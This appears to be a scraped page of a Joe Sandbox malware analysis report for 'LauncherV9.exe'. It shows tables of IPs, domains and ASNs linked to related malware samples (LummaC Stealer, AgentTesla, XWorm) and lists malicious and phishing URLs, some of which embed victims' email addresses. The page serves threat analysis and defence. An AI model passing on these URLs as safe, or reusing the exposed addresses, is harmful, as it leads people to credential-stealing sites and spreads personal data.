Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
89.208.104.175	Service.exe	Get hash	malicious	Unknown	Browse
104.26.12.205	Catch Me If You Can (2002) 1080p.BluRay.x264.Full 744MB.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/?format=xml
	NightFixed 1.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	VibeCall.exe	Get hash	malicious	RHADAMANTHYS	Browse	api.ipify.org/
	VRChat_ERP_Setup 1.0.0.msi	Get hash	malicious	Unknown	Browse	api.ipify.org/
	wEY98gM1Jj.ps1	Get hash	malicious	LummaC Stealer	Browse	api.ipify.org/
	oNvY66Z8jp.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Pmw24ExIdx.ps1	Get hash	malicious	Unknown	Browse	api.ipify.org/
	DeepLauncher.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	[Huawei] Contract for YouTube partners.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	NexoPack Setup 1.0.0.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
23.197.127.21	http://steamcomunity.aiq.ru/	Get hash	malicious	Unknown	Browse	steamcommunity.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
raw.githubusercontent.com	Order.js	Get hash	malicious	AgentTesla	Browse	185.199.108.133
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	185.199.111.133
	COMSurrogate.exe.bin.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	steal.exe.bin.exe	Get hash	malicious	XWorm	Browse	185.199.111.133
	I_ Order.msg	Get hash	malicious	AgentTesla	Browse	185.199.110.133
	I_ Order.msg	Get hash	malicious	AgentTesla	Browse	185.199.108.133
	srclogsys.exe	Get hash	malicious	Unknown	Browse	185.199.109.133
	srclogsys.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	SecuriteInfo.com.Win64.Malware-gen.3746.11060.exe	Get hash	malicious	Unknown	Browse	185.199.108.133
	SubzB.exe	Get hash	malicious	Unknown	Browse	185.199.110.133
github.com	work.js	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	140.82.121.3
	http://t.go.rac.co.uk/r/?id=h1020a75,d7623c,1ac8b&p1=r%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFv%EF%BB%BF%EF%BB%BFi%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFw%EF%BB%BF%EF%BB%BFs%EF%BB%BF%EF%BB%BFt%EF%BB%BF%EF%BB%BFi%EF%BB%BF%EF%BB%BFp%EF%BB%BF%EF%BB%BFs%EF%BB%BF%EF%BB%BFa%EF%BB%BF%EF%BB%BFn%EF%BB%BF%EF%BB%BFd%EF%BB%BF%EF%BB%BFo%EF%BB%BF%EF%BB%BFf%EF%BB%BF%EF%BB%BFf%EF%BB%BF%EF%BB%BFe%EF%BB%BF%EF%BB%BFr%EF%BB%BF%EF%BB%BFs.com/sys/html/SNRgusxqYwmKT0SXMypB0/aW52ZXN0bWVudHNAZmlyc3RvbnRhcmlvLmNvbQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.3
	https://dns.toytviyy.es/NeCp/	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.3
	Play___New___VM___01min 10sec_____;-9415036076e8bac121c0e98c86740024257f1403349096ae54.htm	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.4
	https://sp-track.info.socialmaud.digital/api/v1/track/click/355/30046/17/default/6b7d5c97-8b19-4c41-b355-64ecd84af44a?redirecturl=https://gamma.app/docs/POM-Technologies-Proposal-1tjhhormn8i5mpb	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.3
	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	140.82.121.3
	41QUE01 - TAX INVOICE - 7274916 from SFG (Brisbane).html	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.3
	https://t.travel.hiltongrandvacations.com/r/?id=h178a3ad8,189f53d6,13d9fb3c&p1=xj8ae4rm.lindylosidew.ru/usGt/*bG9uZy5uZ3V5ZW5AY3Jlc3RsaW5laG90ZWxzLmNvbQ==	Get hash	malicious	HTMLPhisher, Invisible JS, Tycoon2FA	Browse	140.82.121.3
	https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt	Get hash	malicious	Unknown	Browse	140.82.121.3
	VM Orger Acknowledged.zip	Get hash	malicious	Unknown	Browse	140.82.121.4
steamcommunity.com	Setup.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	InstructionalPostings.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	InstructionalPostings.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
	installsbot.crypt.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	installer_ver19.02.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	installer_ver12.22.exe	Get hash	malicious	LummaC Stealer	Browse	23.192.247.89
	alexx111.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	work.js	Get hash	malicious	Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar	Browse	23.192.247.89
	shuzovv_build.2.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	crypted.7.exe	Get hash	malicious	Unknown	Browse	23.192.247.89
pupmeholk.bet	installsbot.crypt.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.80.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Release.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.169.6
	Installer.exe	Get hash	malicious	LummaC Stealer, Xmrig	Browse	188.114.97.3
	FusionLoader v2.1.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.1
	Installer.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	XClient.exe	Get hash	malicious	XWorm	Browse	104.20.4.235
	finebi.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	f

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LauncherV9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

Windows Analysis Report
LauncherV9.exe